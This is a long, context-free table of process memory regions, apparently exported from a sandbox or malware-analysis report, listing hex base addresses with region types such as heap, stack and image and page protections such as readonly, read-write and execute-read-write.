unkown
|
page execute and read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
3601000
|
unkown
|
page read and write
|
||
370000
|
heap default
|
page read and write
|
||
417000
|
heap default
|
page read and write
|
||
140000
|
heap private
|
page read and write
|
||
930000
|
unkown
|
page readonly
|
||
360000
|
unkown
|
page readonly
|
||
25BE000
|
unkown
|
page read and write
|
||
42D000
|
heap default
|
page read and write
|
||
7FF000E0000
|
unkown
|
page read and write
|
||
5B7000
|
heap default
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
170000
|
unkown
|
page readonly
|
||
24BE000
|
unkown
|
page read and write
|
||
26B0000
|
unkown
|
page read and write
|
||
610000
|
unkown
|
page readonly
|
||
2260000
|
unkown
|
page readonly
|
||
2247000
|
unkown
|
page readonly
|
||
3042000
|
unkown
|
page read and write
|
||
221000
|
unkown
|
page execute and read and write
|
||
26B0000
|
unkown
|
page read and write
|
||
160000
|
unkown
|
page readonly
|
||
87E000
|
stack
|
page read and write
|
||
D0000
|
unkown
|
page readonly
|
||
90000
|
unkown
|
page readonly
|
||
4B6000
|
heap default
|
page read and write
|
||
690000
|
unkown
|
page readonly
|
||
280000
|
unkown
|
page readonly
|
||
20000
|
unkown
|
page readonly
|
||
810000
|
unkown
|
page readonly
|
||
2A00000
|
unkown
|
page readonly
|
||
2A30000
|
heap private
|
page read and write
|
||
251000
|
unkown
|
page execute and read and write
|
||
3021000
|
unkown
|
page read and write
|
||
1D57000
|
unkown
|
page readonly
|
||
7EFDF000
|
unkown
|
page read and write
|
||
3B0000
|
heap default
|
page read and write
|
||
A5E000
|
stack
|
page read and write
|
||
AB000
|
unkown
|
page read and write
|
||
440000
|
heap default
|
page read and write
|
||
13E000
|
heap default
|
page read and write
|
||
3083000
|
unkown
|
page read and write
|
||
530000
|
heap default
|
page read and write
|
||
26B0000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
2F6B000
|
unkown
|
page read and write
|
||
A4E000
|
unkown
|
page read and write
|
||
8B000
|
unkown
|
page read and write
|
||
E0000
|
unkown
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
330000
|
unkown
|
page readonly
|
||
240000
|
unkown
|
page readonly
|
||
1B490000
|
unkown
|
page read and write
|
||
4E3000
|
heap default
|
page read and write
|
||
D0000
|
unkown
|
page readonly
|
||
1E80000
|
unkown
|
page readonly
|
||
600000
|
heap default
|
page read and write
|
||
5D0000
|
unkown
|
page readonly
|
||
31B2000
|
unkown
|
page read and write
|
||
670000
|
unkown
|
page readonly
|
||
4C0000
|
unkown
|
page readonly
|
||
1C960000
|
heap private
|
page read and write
|
||
7FF001E0000
|
unkown
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
1C69E000
|
unkown
|
page read and write
|
||
256F000
|
unkown
|
page read and write
|
||
1AC000
|
unkown
|
page read and write
|
||
2100000
|
unkown
|
page readonly
|
||
1B40A000
|
unkown
|
page read and write
|
||
2067000
|
unkown
|
page readonly
|
||
7FF00248000
|
unkown
|
page execute and read and write
|
||
410000
|
heap default
|
page read and write
|
||
12F72000
|
unkown
|
page read and write
|
||
26B0000
|
unkown
|
page read and write
|
||
4F0000
|
heap default
|
page read and write
|
||
10021000
|
unkown
|
page execute and read and write
|
||
12F10000
|
unkown
|
page read and write
|
||
20C000
|
unkown
|
page read and write
|
||
2D6E000
|
stack
|
page read and write
|
||
34D6000
|
unkown
|
page read and write
|
||
2BF000
|
unkown
|
page read and write
|
||
10021000
|
unkown
|
page execute and read and write
|
||
2860000
|
unkown
|
page readonly
|
||
35FE000
|
unkown
|
page read and write
|
||
737000
|
heap default
|
page read and write
|
||
3057000
|
unkown
|
page read and write
|
||
BD0000
|
heap private
|
page read and write
|
||
9D0000
|
heap private
|
page read and write
|
||
D0000
|
unkown
|
page readonly
|
||
3095000
|
unkown
|
page read and write
|
||
5FD000
|
heap default
|
page read and write
|
||
3CA0000
|
unkown
|
page read and write
|
||
28BE000
|
unkown
|
page read and write
|
||
1F0000
|
unkown
|
page write copy
|
||
35F4000
|
unkown
|
page read and write
|
||
24AD000
|
stack
|
page read and write
|
||
275E000
|
unkown
|
page read and write
|
||
2E0E000
|
unkown
|
page read and write
|
||
340000
|
heap private
|
page read and write
|
||
650000
|
heap default
|
page read and write
|
||
7FF00180000
|
unkown
|
page read and write
|
||
5C7000
|
heap default
|
page read and write
|
||
2260000
|
unkown
|
page readonly
|
||
2420000
|
heap private
|
page read and write
|
||
2A34000
|
heap private
|
page read and write
|
||
3048000
|
unkown
|
page read and write
|
||
180000
|
unkown
|
page execute and read and write
|
||
2FB6000
|
unkown
|
page read and write
|
||
2B0000
|
heap private
|
page read and write
|
||
2CA000
|
stack
|
page read and write
|
||
3213000
|
unkown
|
page read and write
|
||
2AB0000
|
heap private
|
page execute and read and write
|
||
386000
|
unkown
|
page read and write
|
||
23C0000
|
heap private
|
page read and write
|
||
860000
|
heap private
|
page read and write
|
||
1C90D000
|
unkown
|
page read and write
|
||
2400000
|
unkown
|
page readonly
|
||
1E80000
|
unkown
|
page readonly
|
||
3242000
|
unkown
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
2870000
|
unkown
|
page readonly
|
||
90000
|
unkown
|
page read and write
|
||
CA000
|
stack
|
page read and write
|
||
B6E000
|
unkown
|
page read and write
|
||
26B0000
|
unkown
|
page read and write
|
||
1E80000
|
unkown
|
page readonly
|
||
2C30000
|
unkown
|
page readonly
|
||
36E6000
|
unkown
|
page read and write
|
||
7FF00112000
|
unkown
|
page execute and read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
3195000
|
unkown
|
page read and write
|
||
1B405000
|
unkown
|
page read and write
|
||
567000
|
heap default
|
page read and write
|
||
2FD3000
|
unkown
|
page read and write
|
||
100000
|
unkown
|
page read and write
|
||
A80000
|
unkown
|
page read and write
|
||
26B0000
|
unkown
|
page read and write
|
||
7FF00240000
|
unkown
|
page execute and read and write
|
||
3617000
|
unkown
|
page read and write
|
||
7FF00200000
|
unkown
|
page execute and read and write
|
||
3A0000
|
heap default
|
page read and write
|
||
2A7A000
|
heap private
|
page execute and read and write
|
||
3C08000
|
unkown
|
page read and write
|
||
8B000
|
unkown
|
page read and write
|
||
26B0000
|
unkown
|
page read and write
|
||
447000
|
heap default
|
page read and write
|
||
7FF0001A000
|
unkown
|
page execute and read and write
|
||
7FF00250000
|
unkown
|
page execute and read and write
|
||
380000
|
heap private
|
page read and write
|
||
494000
|
heap default
|
page read and write
|
||
2F39000
|
unkown
|
page read and write
|
||
35C5000
|
unkown
|
page read and write
|
||
7FF00170000
|
unkown
|
page execute and read and write
|
||
3014000
|
unkown
|
page read and write
|
||
2DEE000
|
stack
|
page read and write
|
||
1B9B0000
|
unkown
|
page read and write
|
||
26B0000
|
unkown
|
page read and write
|
||
3D0000
|
heap private
|
page read and write
|
||
1B0000
|
unkown
|
page readonly
|
||
79E000
|
heap default
|
page read and write
|
||
2067000
|
unkown
|
page readonly
|
||
2A0000
|
heap private
|
page read and write
|
||
7FF00220000
|
unkown
|
page execute and read and write
|
||
10C000
|
unkown
|
page read and write
|
||
1B49E000
|
unkown
|
page read and write
|
||
2F46000
|
unkown
|
page read and write
|
||
4E0000
|
unkown
|
page readonly
|
||
7FF00190000
|
unkown
|
page execute and read and write
|
||
654000
|
heap default
|
page read and write
|
||
35C8000
|
unkown
|
page read and write
|
||
5ED000
|
heap default
|
page read and write
|
||
3171000
|
unkown
|
page read and write
|
||
2A70000
|
heap private
|
page execute and read and write
|
||
2FBA000
|
unkown
|
page read and write
|
||
5D4000
|
heap default
|
page read and write
|
||
2936000
|
unkown
|
page read and write
|
||
35AC000
|
unkown
|
page read and write
|
||
4F5000
|
heap private
|
page read and write
|
||
2530000
|
unkown
|
page read and write
|
||
3D0000
|
unkown
|
page read and write
|
||
A4E000
|
unkown
|
page read and write
|
||
A20000
|
unkown
|
page read and write
|
||
25C000
|
unkown
|
page read and write
|
||
52B000
|
heap private
|
page read and write
|
||
25E0000
|
heap private
|
page read and write
|
||
271000
|
unkown
|
page execute and read and write
|
||
2C0000
|
heap default
|
page read and write
|
||
534000
|
heap default
|
page read and write
|
||
20B000
|
unkown
|
page read and write
|
||
9EC000
|
unkown
|
page read and write
|
||
850000
|
heap private
|
page read and write
|
||
1CB30000
|
heap private
|
page read and write
|
||
1B70000
|
unkown
|
page readonly
|
||
6C0000
|
unkown
|
page readonly
|
||
35EE000
|
unkown
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
297E000
|
unkown
|
page read and write
|
||
5F0000
|
unkown
|
page readonly
|
||
2D90000
|
heap private
|
page read and write
|
||
9A0000
|
heap private
|
page read and write
|
||
3092000
|
unkown
|
page read and write
|
||
2620000
|
unkown
|
page readonly
|
||
2A0C000
|
unkown
|
page readonly
|
||
600000
|
heap default
|
page read and write
|
||
2020000
|
unkown
|
page readonly
|
||
283C000
|
unkown
|
page read and write
|
||
BED000
|
stack
|
page read and write
|
||
2CA0000
|
unkown
|
page write copy
|
||
61D000
|
heap default
|
page read and write
|
||
2DAE000
|
unkown
|
page read and write
|
||
5F7000
|
heap default
|
page read and write
|
||
180000
|
unkown
|
page execute and read and write
|
||
7FF001F0000
|
unkown
|
page read and write
|
||
26B0000
|
unkown
|
page read and write
|
||
1E80000
|
unkown
|
page readonly
|
||
3176000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
7FF00210000
|
unkown
|
page read and write
|
||
2FAD000
|
unkown
|
page read and write
|
||
10021000
|
unkown
|
page execute and read and write
|
||
790000
|
unkown
|
page readonly
|
||
2CF6000
|
unkown
|
page read and write
|
||
3A0000
|
unkown
|
page readonly
|
||
2C14000
|
unkown
|
page read and write
|
||
140000
|
unkown
|
page read and write
|
||
1D50000
|
unkown
|
page readonly
|
||
8E0000
|
unkown
|
page readonly
|
||
1AD20000
|
unkown
|
page read and write
|
||
26AF000
|
stack
|
page read and write
|
||
1D0000
|
unkown
|
page execute and read and write
|
||
490000
|
unkown
|
page readonly
|
||
26B0000
|
unkown
|
page read and write
|
||
266E000
|
unkown
|
page read and write
|
||
610000
|
heap default
|
page read and write
|
||
10021000
|
unkown
|
page execute and read and write
|
||
3216000
|
unkown
|
page read and write
|
||
14C000
|
stack
|
page read and write
|
||
1E0000
|
unkown
|
page read and write
|
||
2C7E000
|
unkown
|
page read and write
|
||
2B80000
|
heap private
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
1CA6E000
|
unkown
|
page read and write
|
||
3C9A000
|
unkown
|
page read and write
|
||
7FF00270000
|
unkown
|
page execute and read and write
|
||
AD0000
|
unkown
|
page write copy
|
||
31E0000
|
unkown
|
page read and write
|
||
291D000
|
unkown
|
page read and write
|
||
270000
|
heap private
|
page read and write
|
||
28F0000
|
unkown
|
page readonly
|
||
35EB000
|
unkown
|
page read and write
|
||
9D0000
|
heap private
|
page read and write
|
||
100000
|
unkown
|
page read and write
|
||
4F0000
|
unkown
|
page readonly
|
||
1E80000
|
unkown
|
page readonly
|
||
2650000
|
unkown
|
page read and write
|
||
354A000
|
unkown
|
page read and write
|
||
2067000
|
unkown
|
page readonly
|
||
26B0000
|
unkown
|
page read and write
|
||
26C0000
|
unkown
|
page read and write
|
||
880000
|
heap private
|
page read and write
|
||
BD8000
|
heap private
|
page read and write
|
||
250000
|
unkown
|
page read and write
|
||
2400000
|
unkown
|
page readonly
|
||
26B0000
|
unkown
|
page read and write
|
||
10021000
|
unkown
|
page execute and read and write
|
||
285D000
|
unkown
|
page read and write
|
||
2E0000
|
heap default
|
page read and write
|
||
86F000
|
stack
|
page read and write
|
||
2840000
|
unkown
|
page readonly
|
||
25C0000
|
unkown
|
page read and write
|
||
2AC000
|
stack
|
page read and write
|
||
2E6000
|
unkown
|
page read and write
|
||
780000
|
heap default
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
470000
|
unkown
|
page readonly
|
||
242E000
|
unkown
|
page read and write
|
||
890000
|
unkown
|
page readonly
|
||
2500000
|
unkown
|
page readonly
|
||
35D8000
|
unkown
|
page read and write
|
||
276F000
|
unkown
|
page read and write
|
||
47B000
|
heap default
|
page read and write
|
||
BC000
|
unkown
|
page read and write
|
||
180000
|
heap private
|
page read and write
|
||
2F49000
|
unkown
|
page read and write
|
||
2F8E000
|
stack
|
page read and write
|
||
8B4000
|
heap private
|
page read and write
|
||
160000
|
heap private
|
page read and write
|
||
27AE000
|
unkown
|
page read and write
|
||
140000
|
unkown
|
page read and write
|
||
12E31000
|
unkown
|
page read and write
|
||
2D25000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
7FFFFF00000
|
unkown
|
page execute and read and write
|
||
8F2000
|
heap private
|
page read and write
|
||
3604000
|
unkown
|
page read and write
|
||
250000
|
unkown
|
page readonly
|
||
10000000
|
unkown image
|
page readonly
|
||
D0000
|
unkown
|
page readonly
|
||
27FE000
|
unkown
|
page read and write
|
||
510000
|
heap default
|
page read and write
|
||
D0000
|
unkown
|
page readonly
|
||
488000
|
heap default
|
page read and write
|
||
585000
|
heap default
|
page read and write
|
||
2190000
|
unkown
|
page readonly
|
||
514000
|
heap default
|
page read and write
|
||
5E4000
|
heap default
|
page read and write
|
||
3F0000
|
unkown
|
page readonly
|
||
2C00000
|
unkown
|
page readonly
|
||
2AE0000
|
heap private
|
page read and write
|
||
1AB000
|
unkown
|
page read and write
|
||
3EF000
|
stack
|
page read and write
|
||
8F0000
|
unkown
|
page readonly
|
||
2CBF000
|
unkown
|
page read and write
|
||
30B2000
|
unkown
|
page read and write
|
||
3D0000
|
heap default
|
page read and write
|
||
2207000
|
unkown
|
page readonly
|
||
AB000
|
stack
|
page read and write
|
||
7FF00280000
|
unkown
|
page execute and read and write
|
||
C1E000
|
unkown
|
page read and write
|
||
7FF000EA000
|
unkown
|
page execute and read and write
|
||
2D3000
|
heap default
|
page read and write
|
||
510000
|
unkown
|
page readonly
|
||
1C0000
|
unkown
|
page execute and read and write
|
||
2FA1000
|
unkown
|
page read and write
|
||
2EFA000
|
unkown
|
page read and write
|
||
27E000
|
unkown
|
page read and write
|
||
2260000
|
unkown
|
page readonly
|
||
3010000
|
unkown
|
page read and write
|
||
7FF00150000
|
unkown
|
page read and write
|
||
614000
|
heap private
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
3086000
|
unkown
|
page read and write
|
||
240000
|
unkown
|
page readonly
|
||
1C0000
|
unkown
|
page read and write
|
||
3418000
|
unkown
|
page read and write
|
||
2900000
|
unkown
|
page read and write
|
||
90000
|
unkown
|
page readonly
|
||
9D8000
|
heap private
|
page read and write
|
||
5A0000
|
unkown
|
page readonly
|
||
3053000
|
unkown
|
page read and write
|
||
840000
|
unkown
|
page readonly
|
||
12CC5000
|
unkown
|
page read and write
|
||
170000
|
unkown
|
page execute and read and write
|
||
2B0000
|
heap default
|
page read and write
|
||
2A2B000
|
unkown
|
page readonly
|
||
26B0000
|
unkown
|
page read and write
|
||
2AF0000
|
unkown
|
page read and write
|
||
3045000
|
unkown
|
page read and write
|
||
B0000
|
unkown
|
page readonly
|
||
A40000
|
heap private
|
page read and write
|
||
7CD000
|
heap default
|
page read and write
|
||
7FF001A0000
|
unkown
|
page read and write
|
||
767000
|
heap default
|
page read and write
|
||
140000
|
unkown
|
page read and write
|
||
1D0000
|
heap private
|
page read and write
|
||
2C30000
|
unkown
|
page read and write
|
||
12DD1000
|
unkown
|
page read and write
|
||
2D0000
|
unkown
|
page read and write
|
||
26B0000
|
unkown
|
page read and write
|
||
2F43000
|
unkown
|
page read and write
|
||
A48000
|
heap private
|
page read and write
|
||
4D0000
|
unkown
|
page readonly
|
||
3028000
|
unkown
|
page read and write
|
||
910000
|
unkown
|
page readonly
|
||
7FF000D0000
|
unkown
|
page read and write
|
||
3073000
|
unkown
|
page read and write
|
||
170000
|
unkown
|
page readonly
|
||
28FF000
|
unkown
|
page read and write
|
||
1B1000
|
unkown
|
page execute and read and write
|
||
12CEC000
|
unkown
|
page read and write
|
||
35DB000
|
unkown
|
page read and write
|
||
560000
|
heap default
|
page read and write
|
||
1C0000
|
unkown
|
page execute and read and write
|
||
2650000
|
unkown
|
page write copy
|
||
1F1000
|
unkown
|
page execute and read and write
|
||
140000
|
unkown
|
page read and write
|
||
2847000
|
heap private
|
page read and write
|
||
950000
|
unkown
|
page readonly
|
||
611000
|
heap default
|
page read and write
|
||
5E7000
|
heap default
|
page read and write
|
||
2F14000
|
unkown
|
page read and write
|
||
CC000
|
stack
|
page read and write
|
||
130000
|
unkown
|
page execute and read and write
|
||
2067000
|
unkown
|
page readonly
|
||
2460000
|
unkown
|
page readonly
|
||
8B0000
|
heap private
|
page read and write
|
||
3006000
|
unkown
|
page read and write
|
||
1B48D000
|
unkown
|
page read and write
|
||
2A0000
|
unkown
|
page readonly
|
||
1B9B0000
|
unkown
|
page read and write
|
||
1EA000
|
stack
|
page read and write
|
||
160000
|
unkown
|
page readonly
|
||
2E0000
|
unkown
|
page read and write
|
||
266000
|
unkown
|
page read and write
|
||
200000
|
heap private
|
page read and write
|
||
270E000
|
unkown
|
page read and write
|
||
4F0000
|
unkown
|
page readonly
|
||
1BA40000
|
heap private
|
page read and write
|
||
7FF001B0000
|
unkown
|
page execute and read and write
|
||
414000
|
heap default
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
231000
|
unkown
|
page execute and read and write
|
||
500000
|
unkown
|
page readonly
|
||
624000
|
heap private
|
page read and write
|
||
2260000
|
unkown
|
page readonly
|
||
674000
|
heap default
|
page read and write
|
||
2840000
|
heap private
|
page read and write
|
||
221000
|
unkown
|
page execute and read and write
|
||
2890000
|
heap private
|
page read and write
|
||
2A70000
|
unkown
|
page readonly
|
||
460000
|
heap default
|
page read and write
|
||
2B0000
|
unkown
|
page read and write
|
||
3685000
|
unkown
|
page read and write
|
||
2F8E000
|
stack
|
page read and write
|
||
1B980000
|
unkown
|
page readonly
|
||
1C760000
|
heap private
|
page read and write
|
||
218D000
|
unkown
|
page read and write
|
||
44D000
|
heap default
|
page read and write
|
||
8D2000
|
heap private
|
page read and write
|
||
8D0000
|
heap private
|
page read and write
|
||
7FF0002C000
|
unkown
|
page execute and read and write
|
||
3070000
|
unkown
|
page read and write
|
||
2C10000
|
unkown
|
page read and write
|
||
300000
|
heap private
|
page read and write
|
||
7FF00020000
|
unkown
|
page read and write
|
||
2570000
|
heap private
|
page read and write
|
||
2830000
|
unkown
|
page readonly
|
||
1C0000
|
unkown
|
page read and write
|
||
238E000
|
stack
|
page read and write
|
||
1C973000
|
heap private
|
page read and write
|
||
2F27000
|
unkown
|
page read and write
|
||
278000
|
heap private
|
page read and write
|
||
1D0F000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
3CC000
|
unkown
|
page read and write
|
||
3AE000
|
heap default
|
page read and write
|
||
570000
|
unkown
|
page readonly
|
||
20000
|
heap private
|
page read and write
|
||
2ECE000
|
stack
|
page read and write
|
||
450000
|
unkown
|
page readonly
|
||
7FF00260000
|
unkown
|
page read and write
|
||
2D0000
|
unkown
|
page readonly
|
||
340E000
|
unkown
|
page read and write
|
||
160000
|
heap private
|
page read and write
|
||
2FD7000
|
unkown
|
page read and write
|
||
370000
|
heap default
|
page read and write
|
||
140000
|
unkown
|
page read and write
|
||
C10000
|
heap private
|
page read and write
|
||
2D3D000
|
stack
|
page read and write
|
||
113000
|
unkown
|
page read and write
|
||
37E000
|
unkown
|
page read and write
|
||
26B0000
|
unkown
|
page read and write
|
||
7FF00290000
|
unkown
|
page execute and read and write
|
||
2FFB000
|
unkown
|
page read and write
|
||
2840000
|
unkown
|
page readonly
|
||
290000
|
heap private
|
page read and write
|
||
3199000
|
unkown
|
page read and write
|
||
2A30000
|
heap private
|
page read and write
|
||
370000
|
heap private
|
page read and write
|
||
9D0000
|
unkown
|
page readonly
|
||
303F000
|
unkown
|
page read and write
|
||
450000
|
unkown
|
page readonly
|
||
35DE000
|
unkown
|
page read and write
|
||
2390000
|
unkown
|
page write copy
|
||
120000
|
unkown
|
page readonly
|
||
330000
|
heap default
|
page read and write
|
||
2F04000
|
unkown
|
page read and write
|
||
120000
|
unkown
|
page readonly
|
||
2F60000
|
unkown
|
page read and write
|
||
5C0000
|
heap default
|
page read and write
|
||
6D0000
|
unkown
|
page readonly
|
||
26B0000
|
unkown
|
page read and write
|
||
527000
|
heap default
|
page read and write
|
||
10021000
|
unkown
|
page execute and read and write
|
||
34FF000
|
unkown
|
page read and write
|
||
D0000
|
unkown
|
page read and write
|
||
C50000
|
heap private
|
page read and write
|
||
944000
|
heap private
|
page read and write
|
||
22C000
|
unkown
|
page read and write
|
||
2B2D000
|
unkown
|
page read and write
|
||
657000
|
heap default
|
page read and write
|
||
2A4000
|
heap private
|
page read and write
|
||
94D000
|
stack
|
page read and write
|
||
480000
|
unkown
|
page readonly
|
||
87E000
|
unkown
|
page read and write
|
||
3B1E000
|
unkown
|
page read and write
|
||
2CBE000
|
unkown
|
page read and write | page guard
|
||
4AA000
|
heap default
|
page read and write
|
||
26B0000
|
unkown
|
page read and write
|
||
2060000
|
unkown
|
page readonly
|
||
1E80000
|
unkown
|
page readonly
|
||
20000
|
unkown
|
page readonly
|
||
107000
|
heap default
|
page read and write
|
||
2CC1000
|
unkown
|
page read and write
|
||
7FF001E7000
|
unkown
|
page read and write
|
||
4F0000
|
heap private
|
page read and write
|
||
830000
|
unkown
|
page readonly
|
||
160000
|
unkown
|
page readonly
|
||
275000
|
unkown
|
page read and write | page guard
|
||
D0000
|
unkown
|
page readonly
|
||
26B0000
|
unkown
|
page readonly
|
||
34C3000
|
unkown
|
page read and write
|
||
687000
|
heap default
|
page read and write
|
||
2530000
|
unkown
|
page read and write
|
||
24FE000
|
stack
|
page read and write
|
||
26B0000
|
unkown
|
page read and write
|
||
4C0000
|
heap default
|
page read and write
|
||
7FF00160000
|
unkown
|
page execute and read and write
|
||
630000
|
unkown
|
page readonly
|
||
A2E000
|
stack
|
page read and write
|
||
4BB000
|
heap default
|
page read and write
|
||
150000
|
unkown
|
page readonly
|
||
470000
|
heap private
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
590000
|
heap private
|
page execute and read and write
|
||
35F1000
|
unkown
|
page read and write
|
||
110000
|
unkown
|
page readonly
|
||
2260000
|
unkown
|
page readonly
|
||
3F5000
|
heap default
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
20000
|
heap private
|
page read and write
|
||
26B0000
|
unkown
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
2650000
|
unkown
|
page read and write
|
||
10021000
|
unkown
|
page execute and read and write
|
||
640000
|
unkown
|
page readonly
|
||
25B0000
|
unkown
|
page readonly
|
||
2EBE000
|
unkown
|
page read and write
|
||
BBC000
|
unkown
|
page read and write
|
||
554000
|
heap default
|
page read and write
|
||
A80000
|
unkown
|
page readonly
|
||
2D05000
|
unkown
|
page read and write
|
||
26B0000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
2FC3000
|
unkown
|
page read and write
|
||
420000
|
unkown
|
page readonly
|
||
5B0000
|
heap default
|
page read and write
|
||
29C0000
|
heap private
|
page read and write
|
||
3682000
|
unkown
|
page read and write
|
||
2067000
|
unkown
|
page readonly
|
||
628000
|
heap default
|
page read and write
|
||
2EF3000
|
unkown
|
page read and write
|
||
1BC0E000
|
unkown
|
page read and write
|
||
26B0000
|
unkown
|
page read and write
|
||
2D0000
|
unkown
|
page read and write
|
||
2060000
|
unkown
|
page readonly
|
||
230000
|
unkown
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
240000
|
heap private
|
page read and write
|
||
46B000
|
heap default
|
page read and write
|
||
ACE000
|
unkown
|
page read and write
|
||
5ED000
|
heap default
|
page read and write
|
||
150000
|
unkown
|
page read and write
|
||
8AC000
|
unkown
|
page read and write
|
||
3BE000
|
heap default
|
page read and write
|
||
7FF000E5000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
580000
|
heap default
|
page read and write
|
||
2A52000
|
heap private
|
page read and write
|
||
1EB000
|
unkown
|
page read and write
|
||
2510000
|
unkown
|
page write copy
|
||
7EFDF000
|
unkown
|
page read and write
|
||
630000
|
unkown
|
page readonly
|
||
60000
|
unkown
|
page readonly
|
||
35D5000
|
unkown
|
page read and write
|
||
F0000
|
unkown
|
page write copy
|
||
48F000
|
heap default
|
page read and write
|
||
5B0000
|
heap default
|
page read and write
|
||
271D000
|
unkown
|
page read and write
|
||
537000
|
heap default
|
page read and write
|
||
7FF00012000
|
unkown
|
page execute and read and write
|
||
26B0000
|
unkown
|
page read and write
|
||
210000
|
unkown
|
page execute and read and write
|
||
434000
|
heap default
|
page read and write
|
||
3F7000
|
heap default
|
page read and write
|
||
547000
|
heap default
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
280000
|
unkown
|
page readonly
|
||
10000000
|
unkown image
|
page readonly
|
||
10021000
|
unkown
|
page execute and read and write
|
||
2770000
|
unkown
|
page write copy
|
||
7EFDF000
|
unkown
|
page read and write
|
||
35C2000
|
unkown
|
page read and write
|
||
2247000
|
unkown
|
page readonly
|
||
301D000
|
unkown
|
page read and write
|
||
441000
|
heap default
|
page read and write
|
||
276000
|
unkown
|
page read and write
|
||
296E000
|
unkown
|
page read and write
|
||
1B880000
|
unkown
|
page read and write
|
||
1B4EE000
|
unkown
|
page read and write
|
||
344000
|
heap private
|
page read and write
|
||
367E000
|
unkown
|
page read and write
|
||
329B000
|
unkown
|
page read and write
|
||
350000
|
heap default
|
page read and write
|
||
2FF6000
|
unkown
|
page read and write
|
||
8D4000
|
heap private
|
page read and write
|
||
52D000
|
heap default
|
page read and write
|
||
2E60000
|
unkown
|
page readonly
|
||
106000
|
unkown
|
page read and write
|
||
730000
|
heap default
|
page read and write
|
||
2F1A000
|
unkown
|
page read and write
|
||
290000
|
heap private
|
page read and write
|
||
27BD000
|
stack
|
page read and write
|
||
255F000
|
unkown
|
page read and write
|
||
3219000
|
unkown
|
page read and write
|
||
3280000
|
unkown
|
page read and write
|
||
3F0000
|
heap default
|
page read and write
|
||
8C000
|
unkown
|
page read and write
|
||
2067000
|
unkown
|
page readonly
|
||
26DE000
|
unkown
|
page read and write
|
||
2C1A000
|
unkown
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
2440000
|
unkown
|
page readonly
|
||
10000000
|
unkown image
|
page readonly
|
||
264F000
|
unkown
|
page read and write
|
||
38F000
|
stack
|
page read and write
|
||
100000
|
unkown
|
page read and write
|
||
E0000
|
unkown
|
page read and write
|
||
2F21000
|
unkown
|
page read and write
|
||
3607000
|
unkown
|
page read and write
|
||
60000
|
unkown
|
page readonly
|
||
A4F000
|
stack
|
page read and write
|
||
230000
|
unkown
|
page read and write
|
||
320C000
|
unkown
|
page read and write
|
||
2A07000
|
unkown
|
page readonly
|
||
7EFDF000
|
unkown
|
page read and write
|
||
3079000
|
unkown
|
page read and write
|
||
7B0000
|
unkown
|
page readonly
|
||
5B2000
|
heap default
|
page read and write
|
||
5D4000
|
heap default
|
page read and write
|
||
962000
|
heap private
|
page read and write
|
||
7B0000
|
unkown
|
page readonly
|
||
1B390000
|
unkown
|
page readonly
|
||
610000
|
heap private
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
250E000
|
stack
|
page read and write
|
||
7D2000
|
heap default
|
page read and write
|
||
2470000
|
unkown
|
page readonly
|
||
3E0000
|
unkown
|
page readonly
|
||
359C000
|
unkown
|
page read and write
|
||
390000
|
unkown
|
page readonly
|
||
D0000
|
unkown
|
page read and write
|
||
25C000
|
stack
|
page read and write
|
||
3CA6000
|
unkown
|
page read and write
|
||
D0000
|
unkown
|
page readonly
|
||
8A4000
|
heap private
|
page read and write
|
||
54D000
|
heap default
|
page read and write
|
||
18C000
|
stack
|
page read and write
|
||
F0000
|
unkown
|
page read and write
|
||
7FF001C0000
|
unkown
|
page read and write
|
||
4A4000
|
heap default
|
page read and write
|
||
280000
|
unkown
|
page read and write
|
||
2740000
|
unkown
|
page read and write
|
||
2430000
|
heap private
|
page read and write
|
||
754000
|
heap default
|
page read and write
|
||
76D000
|
heap default
|
page read and write
|
||
3076000
|
unkown
|
page read and write
|
||
1BB7E000
|
unkown
|
page read and write
|
||
7FF00022000
|
unkown
|
page execute and read and write
|
||
26B0000
|
unkown
|
page read and write
|
||
35C000
|
unkown
|
page read and write
|
||
2D9E000
|
unkown
|
page read and write
|
||
2FFF000
|
unkown
|
page read and write
|
||
57C000
|
heap default
|
page read and write
|
||
517000
|
heap default
|
page read and write
|
||
200000
|
unkown
|
page readonly
|
||
1E80000
|
unkown
|
page readonly
|
||
8A0000
|
heap private
|
page read and write
|
||
366D000
|
unkown
|
page read and write
|
||
2844000
|
heap private
|
page read and write
|
||
377000
|
heap default
|
page read and write
|
||
427000
|
heap default
|
page read and write
|
||
150000
|
unkown
|
page execute and read and write
|
||
20000
|
unkown
|
page readonly
|
||
98F000
|
stack
|
page read and write
|
||
620000
|
heap private
|
page read and write
|
||
231000
|
unkown
|
page execute and read and write
|
||
56D000
|
heap default
|
page read and write
|
||
4F7000
|
heap default
|
page read and write
|
||
31F9000
|
unkown
|
page read and write
|
||
211000
|
unkown
|
page execute and read and write
|
||
540000
|
heap default
|
page read and write
|
||
7FF001D0000
|
unkown
|
page execute and read and write
|
||
2FF0000
|
unkown
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
10021000
|
unkown
|
page execute and read and write
|
||
68D000
|
heap default
|
page read and write
|
||
1D0000
|
unkown
|
page readonly
|
||
500000
|
heap private
|
page read and write
|
||
35BF000
|
unkown
|
page read and write
|
||
5B7000
|
heap default
